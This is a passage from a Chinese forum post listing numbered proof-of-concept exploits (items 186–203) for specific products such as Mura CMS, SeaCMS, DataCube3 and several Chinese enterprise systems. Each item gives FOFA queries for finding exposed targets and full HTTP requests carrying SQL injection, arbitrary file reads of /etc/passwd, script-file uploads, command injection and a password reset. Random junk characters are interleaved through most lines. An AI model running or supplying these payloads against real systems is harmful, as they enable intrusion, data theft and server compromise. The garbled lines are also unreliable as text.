GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
' ]' x- j: g/ B1 b2 P( y/ b1 P& ^Host: host
8 L; H" B! Q5 O4 e. h+ I P. k3 j/ p1 D
u8 }: T3 M7 q
186. F-logic DataCube3 SQL注入
2 W# b* w: ^: B: A& A+ JCVE-2024-31750
1 H, l2 e: W/ ?* B. \9 ~1 tF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统% G- Y# ^, Z! b6 D
FOFA:title=="DataCube3"- N4 O' t, r5 |
POST /admin/pr_monitor/getting_index_data.php HTTP/1.10 j; j, O* T8 w* S2 g- h
Host: your-ip
( J9 M" T. G2 t" u1 V! h# @* U- PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
; U% K; |, K# j3 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
. i8 ~ L/ g( ^/ xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ a" B" k& ^4 }3 J" I' R- p; ^
Accept-Encoding: gzip, deflate; X1 d5 s; Z g4 f/ v; Q
Connection: close
1 U3 I# |2 x; K) ~Content-Type: application/x-www-form-urlencoded* Z2 _# p5 G6 H% |) s9 S: J
1 w% ?# h! ~& S( Y% ~3 ?/ Q7 I* @req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
) i5 h/ j) U' P2 d. |* t5 r- d1 L8 j7 n4 {. Z# B0 a
6 Y8 F& O1 j. k# g
187. Mura CMS processAsyncObject SQL注入5 v; @# d4 `, U" y u6 d
CVE-2024-32640! T9 O8 U5 }6 i3 t
FOFA:"Mura CMS"& g& p; f, c8 k( r
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
; {6 f! Y, f. _: L- [( g1 WHost: your-ip
& f& P, O& I9 o$ P; CContent-Type: application/x-www-form-urlencoded
( o8 q, }/ Q9 N3 q9 b9 S4 `* o5 p: U5 L1 ]# x
3 {4 o5 s a9 w( w) O- {& ^$ ]object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=12 c: d% v; w2 X. {5 C
9 r u4 |! a+ F) l' Z1 W" t/ T
; R( R; x( Z8 T! |, C8 t# r188. 叁体-佳会视频会议 attachment 任意文件读取
& D; C. t% l( E; A: Q3 W" ]version <= 3.9.78 L# \) z" \7 C9 _6 x) Q
FOFA:body="/system/get_rtc_user_defined_info?site_id"
+ X k0 |- [4 V( M; R" i( v; ]; oGET /attachment?file=/etc/passwd HTTP/1.14 h7 s7 e ^1 |. h! X0 f6 g* ^
Host: your-ip
8 e7 U6 Z( n5 F3 L9 W2 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
* `" i) c e' n3 H' [9 y: [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' N" v9 a" F" {2 G
Accept-Encoding: gzip, deflate
0 ]# ?2 \7 _: dAccept-Language: zh-CN,zh;q=0.9,en;q=0.81 Q1 c& Z3 i! _0 m) i) Q a
Connection: close
E3 [; ]2 X# W& {" a7 [
, g) f; T' ~0 S' f# Y2 @9 C
# v+ H, S8 t Y% n189. 蓝网科技临床浏览系统 deleteStudy SQL注入
- Y0 J2 c) M5 ~# O/ YFOFA:app="LANWON-临床浏览系统"
0 n' [; ]4 Y+ h. {' L; c" kGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
) {+ h2 {4 B. A: e3 l4 K9 M( RHost: your-ip
4 G3 U. R( s: Z0 k1 H/ u f( b3 ]User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36, n9 l; J) f4 t4 J/ X h; ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- {# j6 I3 K$ zAccept-Encoding: gzip, deflate
6 V0 \# ~5 g) gAccept-Language: zh-CN,zh;q=0.9! A+ k9 ]/ U6 e- ]
Connection: close
; r! Q& h( _( c$ s! Q8 g$ O
4 \ Z# ?; _! }, w" K+ H/ \( i4 t% A8 h, o6 g j4 r
190. 短视频矩阵营销系统 poihuoqu 任意文件读取. T& e! j* }' s: ]) |: a# j [9 D
FOFA:title=="短视频矩阵营销系统"
$ |4 h- \- L: r9 }. J- U1 zPOST /index.php/admin/Userinfo/poihuoqu HTTP/2# F/ Q5 a/ P4 b" W o
Host: your-ip
( ~5 t+ P; K; [4 S3 T8 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
9 U7 ^ k4 X" r7 ~% }, `" ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9% Y7 T$ c6 x4 J1 J8 A' T0 C
Content-Type: application/x-www-form-urlencoded
% W. c/ |( i' P% p. H% J' g9 cAccept-Encoding: gzip, deflate# R: B5 N7 O3 H3 S- v
Accept-Language: zh-CN,zh;q=0.9
4 e; Y( x: V4 P8 C
4 I. Y0 q- \4 I4 h7 u" J* H! g6 I% { Jpoi=file:///etc/passwd* K! O2 P4 V: m, m/ P$ O
5 v9 i; W* x% f: z* e/ J/ k
( N! B8 I( K# t7 @1 D191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入! \. M c; Y3 V0 }0 f
FOFA:body="/CDGServer3/index.jsp"0 i, ]( B/ M6 z
POST /CDGServer3/js/../NavigationAjax HTTP/1.1( i5 o6 B' v1 n" w# T& I, L; @% S
Host: your-ip( ~( F$ A% j( u8 H) ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ p# T: r. }' f% g# x, b
Content-Type: application/x-www-form-urlencoded
1 A- P: e2 J3 Z+ T' P4 g& K0 p6 B; B8 J! N: v% X( f4 }7 u- _
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
( x9 d. _4 Q D2 w' C8 b& n+ ?/ ^8 e' |" A& K1 d0 V. |
$ I$ U7 G/ N0 @: u2 Z. `
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传7 r9 R' l' z5 }
FOFA:title="用户登录_富通天下外贸ERP"
% E& c7 X9 d: QPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.11 A- w8 V/ E; i4 m" L M* Q! D. u
Host: your-ip
9 B2 n- `2 p+ `7 X/ B$ QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
4 k$ G, O# f6 b) kContent-Type: application/x-www-form-urlencoded3 @+ q$ V5 d B. W S& @
& q1 R; f; y1 a. x4 S+ r' H/ D' h, W6 a
<% @ webhandler language="C#" class="AverageHandler" %>
" P, h2 f2 q( N i* xusing System;/ C" J% _/ b7 ]
using System.Web;0 c1 {7 M) L) k/ e! c" ~/ e
public class AverageHandler : IHttpHandler' D, ~2 D k9 C1 h5 O/ u
{
( t) C3 c6 E: X, fpublic bool IsReusable
! R4 d& x1 h$ m{ get { return true; } }
. [. M% z6 x: A( Vpublic void ProcessRequest(HttpContext ctx); _& b- j1 [2 }) M6 e7 v+ Y
{
K& o- g5 K0 |3 _7 C* k' {0 U0 pctx.Response.Write("test");
U6 w- @* m$ ~! L: o7 X}
1 [: ~: q+ h7 m1 R}+ r/ w |( j; E( ^
7 e8 J7 ?. s0 Z+ o4 P7 v0 E
, J' h5 ]$ C4 U' {
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行7 V6 o( ^3 x6 c3 h; m3 F4 H' I6 N2 U
FOFA:body="山石云鉴主机安全管理系统"9 h f5 \: }! }
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
: F3 B( k9 E: m1 Q8 m, z7 N4 _Host:
) ?$ W2 {. g: a9 R2 rCookie: PHPSESSID=2333333333333;
. J. Y$ @1 }) j1 X" }. bContent-Type: application/x-www-form-urlencoded
& v! S# L' [2 z0 SUser-Agent: Mozilla/5.0
/ l Q! a: D9 u
' A3 j1 Z1 K6 s2 p( y+ j" N4 q8 h( K3 P) b, i. ?
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.10 u" K( ]; Q* Q
Host:7 G4 u7 M- S9 b a
User-Agent: Mozilla/5.0
8 O% f* P( M' l4 f' u# UAccept-Encoding: gzip, deflate/ ]+ g1 H. ~( h9 U
Accept: */*3 t# }4 S! ~$ u
Connection: close; k# r" N+ W% t# ?/ m) I
Cookie: PHPSESSID=2333333333333;
3 R5 M3 }* Z; c6 `( Q% i3 c' L" yContent-Type: application/x-www-form-urlencoded% V& N( Z0 ?5 M2 z/ G' a$ l3 w
Content-Length: 84
$ }, R% a7 x( F1 A! i. C3 i' }$ i* L4 E. O4 _, [
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
# _8 _4 G+ C1 |* ~* ]& M% t
; Z3 Z+ K, l4 g- w) R1 w
1 L7 _! \% F% b" iGET /master/img/config HTTP/1.1- }* l5 K+ N/ e
Host:
! f0 p6 N! C" D8 YUser-Agent: Mozilla/5.0) Z2 o. M" ?7 l1 Y: m& c2 Q
) s. E1 D, S" m, c/ X
/ a7 p4 H; w( W/ R) c e
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传 {9 f" ^4 L: |, b
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在$ V1 W t2 N' b* m( }$ e3 }2 n
3 V0 i0 s- X* c$ \# U& j
POST /servlet/uploadAttachmentServlet HTTP/1.1. k7 W+ _3 G" Q- X, p* F6 `3 s f
Host: host; D, q6 k5 c; N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
3 w9 z% z8 ]1 mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 V: v+ \) _2 C/ r: N4 b( G1 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- M4 K8 T* J2 v4 o' Z! CAccept-Encoding: gzip, deflate N' u1 G# D0 x: e
Connection: close8 C! R6 L0 P5 h$ d, b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk. H" q" _/ ^8 V& ^; A% x
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
' W- B8 F7 u0 @& C) b" R; {# a/ \; j* C# W1 J
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp") L' M) Z0 s8 s; a2 y6 l
Content-Type: text/plain# o, ?6 R0 {3 u; H$ Q+ p
<% out.println("hello");%>
3 v9 S. S3 k' q$ ~ [------WebKitFormBoundaryKNt0t4vBe8cX9rZk
; i# Z9 b* p1 x. f; w l+ k/ DContent-Disposition: form-data; name="json"8 R9 Q, K* L% x! m
{"iq":{"query":{"UpdateType":"mail"}}}; V' E- B" j' u7 V4 }
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--# E8 o4 ~5 F9 o: w% ~
( W: d+ H8 N! o! O
9 S( H/ R5 C0 w! c' d" X) ?" M/ g195. 飞鱼星上网行为管理系统 send_order.cgi命令执行6 D# {4 `/ `- O# n& I5 Y
FOFA:title=="飞鱼星企业级智能上网行为管理系统2 j" {# Q+ W6 J" A2 h. g0 D
POST /send_order.cgi?parameter=operation HTTP/1.1
4 m2 D7 ?1 E1 H* z% ~. I4 Z, U0 aHost: 127.0.0.1
7 S. G$ M0 L% G7 V6 RPragma: no-cache6 Q) O5 T4 H3 L$ u( N, t$ k% T7 G/ B2 [
Cache-Control: no-cache2 z+ z8 J# O' L+ Q- `4 b4 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! S3 \7 ?9 @! |. M- j
Accept: */*' R4 V+ T. j( I* L! X! Q' p
Accept-Encoding: gzip, deflate
I! j6 M' W: |; p7 bAccept-Language: zh-CN,zh;q=0.9
, U& G, u: ?* V6 e, Z4 K6 DConnection: close5 }" k2 X0 S, @7 T ~/ i4 V5 Y2 ~
Content-Type: application/x-www-form-urlencoded
/ F6 j* g$ b0 MContent-Length: 68
9 ^$ j( ~5 w* u5 g; n* o' X3 c- l. t$ E! h. U ^
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}, L, v$ f, y4 C9 S6 N6 t0 H
' i. q# @0 Q% ^; i# k" Z
4 A: z/ K0 J7 B1 N' l196. 河南省风速科技统一认证平台密码重置6 g0 C! [# B& M; _, f E
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
: s4 a7 q: @! e, \POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
$ n0 p/ C4 i! Z0 G* u% [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.369 I' o l% L; _) q! W7 D
Content-Type: application/json;charset=UTF-84 b: B: N4 t# v0 H+ \
X-Requested-With: XMLHttpRequest
2 C$ g d! R* `3 THost:: b7 @' v) Y' ~1 Z5 O3 U7 C
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
4 G7 v+ U5 i* E3 fContent-Length: 45; I* J0 K* ?# }0 [1 K
Connection: close
3 {5 m0 F6 g4 f% S7 i; h( B$ w& v+ P& Y
{"xgh":"test","newPass":"test666","email":""}0 S1 ]) R# l, p5 b) k' P
( ` m1 V! \+ k# ?) d$ h( d- h/ ?
7 c) u( ]! R3 m% }197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入+ M: L& Y1 X* k- T9 G% f
FOFA:app="浙大恩特客户资源管理系统"
% y( c8 p }7 V$ ~GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1$ y9 ^% C& K2 i$ s& o, F
Host:3 q1 F" r* q; S% w" ]7 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36! i, ]0 [8 R$ U0 C/ b8 {* z
Accept-Encoding: gzip, deflate- Q: D9 P3 d5 r# D4 z9 _8 \2 S6 v
Connection: close
- m! |$ V3 |" h. p- g
: ~ Z! T/ N6 B6 c' l; P4 ?$ H$ R/ {% B; R/ d% g. T
' w1 H* o. H: i i" D' d: C198. 阿里云盘 WebDAV 命令注入
4 J* v0 C6 c, PCVE-2024-29640- U( P* Q3 D3 O* {
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
7 j: P4 ]+ E1 A8 g8 uCookie: sysauth=41273cb2cffef0bb5d0653592624cf64, M5 ?5 G. N; o) L% ^# U$ f" u. V
Accept: */*: E' a! p* \! x" d6 O( u
Accept-Encoding: gzip, deflate" M$ e f3 P5 X4 D' @! t
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.67 _' y: F1 ?- W; m& b3 l
Connection: close
5 Z) H8 ^5 P( b* u
! D* U2 y7 k3 G: i
) o, D5 q/ N& M8 }' k2 C6 t199. cockpit系统assetsmanager_upload接口 文件上传1 S2 G5 |. [" H0 o: N8 R2 F" E
2 k" Y1 `$ t5 F( w/ z9 P% Z8 h1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
8 Q0 j) ]& {! c( L- ?0 o& ^1 LGET /auth/login?to=/ HTTP/1.1
; o# e- D! R2 U* _, }
' J3 ]5 L$ W) c9 ~, W. v响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"# |: ]6 r& C$ u! w, `
3 u- |0 {7 ~2 j2.使用刚才上一步获取到的jwt获取cookie:# h, f0 ?) U$ E5 W" _3 @
. j B/ I" P2 ?2 |" X: q4 d! ]
POST /auth/check HTTP/1.1, G- z& w1 z) @- j
Content-Type: application/json
) ]7 d7 w; }! O3 E
7 ~, z& \( c) P# ]2 W{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}. g' a+ s3 S# T2 O5 _' p
; Q6 u" p3 S9 m5 E3 \+ D响应:200,返回值:
. ~& E) ~5 m) x' u5 DSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/! ~0 z5 \' b8 A' q* L- i3 D! V
Fofa:title="Authenticate Please!"* j1 h$ P) b! E1 j& R. g
POST /assetsmanager/upload HTTP/1.1$ M9 d/ T$ Y. X) @
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3# g6 `$ m' f) ?% R
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92! X# T n0 ^% ]+ o# w0 H
/ z" r( I F" E# n+ D% u* \$ p' `; G+ P
-----------------------------36D28FBc36bd6feE7Fb3
6 S! }8 ]' M% Y }6 }, \ BContent-Disposition: form-data; name="files[]"; filename="tttt.php"
* X1 ~# ^4 X4 ]$ i) A% P6 n5 @, MContent-Type: text/php N* U, G$ `- B+ J7 b
: Y$ V5 q7 |1 E5 h4 l
<?php echo "tttt";unlink(__FILE__);?>
# B4 m6 u5 ~ d. r: h-----------------------------36D28FBc36bd6feE7Fb3, c' q+ L8 N! c. N7 T' r
Content-Disposition: form-data; name="folder"! S( m7 }# _. `! {3 j0 p3 x, e
& n3 O9 F. y$ W2 k S-----------------------------36D28FBc36bd6feE7Fb3--# K3 s7 K! l( o* o0 n0 P
% Q$ m- T9 P! M# D: ?8 W& @* {9 X
& Y$ Y! O% K6 x
/storage/uploads/tttt.php# M* I# \: Z2 s
( W( [* }1 o6 @( v
200. SeaCMS海洋影视管理系统dmku SQL注入
" {( T$ ~* V; \& A- t }" N, }FOFA:app="海洋CMS") {2 V: V" E7 ^8 o2 v* J2 w0 b; U3 |
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1/ e7 m# f* o4 q- B' k
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s- u4 z9 l/ a3 d& o
Upgrade-Insecure-Requests: 1
3 v1 Y5 K% A, a2 e2 }6 Q/ o( q/ T2 |Cache-Control: max-age=0* d* @7 G3 K4 [) Q; R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 d. L; Y( e* e2 ~+ eAccept-Encoding: gzip, deflate
5 P2 ~4 i. o Y9 }Accept-Language: zh-CN,zh;q=0.9
! l0 v) n1 M, U9 a) j
& b( d, C: Q4 m4 t1 x0 q. x& L& L: M2 y8 h$ }: r
201. 方正全媒体新闻采编系统 binary SQL注入
. A% w% ?9 H3 ~8 o$ fFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"( \4 z; p$ |- R8 r& B
POST /newsedit/newsplan/task/binary.do HTTP/1.1$ K$ q* Y' D/ Z$ S$ }' T7 q
Content-Type: application/x-www-form-urlencoded
% \) O$ t8 s. |4 v% B0 aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( q+ l8 Q& C1 eAccept-Encoding: gzip, deflate
7 h) b, t$ N& a: f2 { Z# C) H% L6 RAccept-Language: zh-CN,zh;q=0.9% V% r: |( j9 e+ Q
Connection: close9 o; |/ J. d% V6 S
* S E3 P, J% |/ Z7 z
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
O5 |& I4 _& _+ ^, L6 x6 f+ `) V$ i$ |( _5 j7 O# r
, H/ |3 F: U# G" R8 l202. 微擎系统 AccountEdit任意文件上传" S) r8 ~. G: N
FOFA:body="/Widgets/WidgetCollection/"+ D8 j0 [4 B$ [, h4 F
获取__VIEWSTATE和__EVENTVALIDATION值
7 m( c% v! } N7 ]5 t" @GET /User/AccountEdit.aspx HTTP/1.1
8 P U/ Q; @0 x4 \( p5 n% H0 `Host: 滑板人之家, Q; e2 a8 ^' w9 d1 h7 i8 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31* q3 V9 X( m9 @0 u0 x- W5 u' c1 z5 R
Content-Length: 0$ ^4 q/ G% J/ i; h. p/ @8 z
4 ~; W: y# e& G6 ^2 E/ t7 h
7 o! I! {- |: e$ h, v; w: K. h% H替换__VIEWSTATE和__EVENTVALIDATION值 d2 l0 K4 U% M J; w' A
POST /User/AccountEdit.aspx HTTP/1.1
- H# _4 G6 {& Z9 S/ d/ x: |Accept-Encoding: gzip, deflate, br
3 L Q' e: ]5 ^Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687$ G5 H* G- z% U+ n
; G M1 O% ]' h3 x0 D( G-----------------------------786435874t38587593865736587346567358735687
1 B2 N) A9 z7 H& J/ EContent-Disposition: form-data; name="__VIEWSTATE"0 r' c7 k$ q) g9 c' ~. ~
$ V; a0 K' |! k# X& o; X+ {% X
__VIEWSTATE5 o2 \; E) V5 R. X$ @1 J
-----------------------------786435874t38587593865736587346567358735687
% ? i7 X0 p0 I1 S4 }/ g; `Content-Disposition: form-data; name="__EVENTVALIDATION"
' i* _0 H& k+ s. D+ a% @3 E3 K
) ]8 l; p1 V+ i__EVENTVALIDATION
7 g6 f; W8 N7 F3 E$ g( @-----------------------------786435874t38587593865736587346567358735687
$ E" Y5 E/ R# n; `Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"( n A% ]% \7 `- V7 g$ u3 M) E2 n
Content-Type: text/plain8 x* N. P! R* Y; r1 q+ n
3 U8 Y; X' }( B
Hello World!$ Z) O7 b9 H* E
-----------------------------786435874t38587593865736587346567358735687
+ j! P# o: T0 T3 E& ]Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload": F( Y$ \* S3 G, O: _8 [! c' a
3 y+ \3 h* ~8 Y0 U' e
上传图片9 L* |7 _/ `) `2 D) a
-----------------------------786435874t38587593865736587346567358735687
6 c0 X9 e9 `8 Z% ]: zContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"7 |8 t& i. b5 E% d& i. E
9 B" q0 R/ x8 L! ^% q1 ?1 q6 C+ c2 g0 ?4 ~2 f3 Q
-----------------------------786435874t38587593865736587346567358735687
`9 `6 h0 N! A, T3 Z/ I0 gContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
8 B4 p6 c# {; V# y# l& d. k5 D8 t$ l$ n# T
- y& ]8 w3 |, [# @ `/ u
-----------------------------786435874t38587593865736587346567358735687--! [4 [; B! U+ [3 K1 k4 q
v3 N6 p8 w/ B# }$ s6 l+ w* X
u2 i5 ^3 s: K0 j/ |/_data/Uploads/1123.txt9 D. a! z5 R, Y& m
" R) [6 d: m0 M3 w$ A
203. 红海云EHR PtFjk 文件上传2 |. I) [: G( _) K/ b
FOFA:body="RedseaPlatform"* m1 m8 B3 S2 n) a- I
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1. q4 a+ a* Y( O6 R8 t; ?, X
Host: x.x.x.x) H4 O, P: W h
Accept-Encoding: gzip
- Y2 w* r1 Z2 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: `1 V# ~/ ]( \0 u4 d! I3 H
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4! k' v! Z* T# q
Content-Length: 210+ d; [' N$ s1 s# y/ ~) h0 G. s
& s9 c) S9 }2 J/ ^------WebKitFormBoundaryt7WbDl1tXogoZys4
& c, p9 j9 M; \4 g% l- V* BContent-Disposition: form-data; name="fj_file"; filename="11.jsp"3 |/ S2 z+ c# x6 F" i1 d0 R
Content-Type:image/jpeg
. H; T# s' D/ T9 C* C2 V- T
9 U) ?/ z- k, v0 N8 |3 u<% out.print("hello,eHR");%>8 \1 M: x+ U9 P8 T- @" s& e2 G
------WebKitFormBoundaryt7WbDl1tXogoZys4--* j# @ |7 F0 ]' Z+ o
P1 r3 W( b# j4 R
1 k* S Y) ]7 Y' Z9 Q* ]* M5 Z8 Y& M0 y- a8 y
6 j* {* {. h/ k6 X: c
% K( j* o' u( ], X6 D4 v- A5 }+ @4 F# g3 t" A; U2 j3 t
|
发表于 2024-6-5 14:31:29
收藏
支持
反对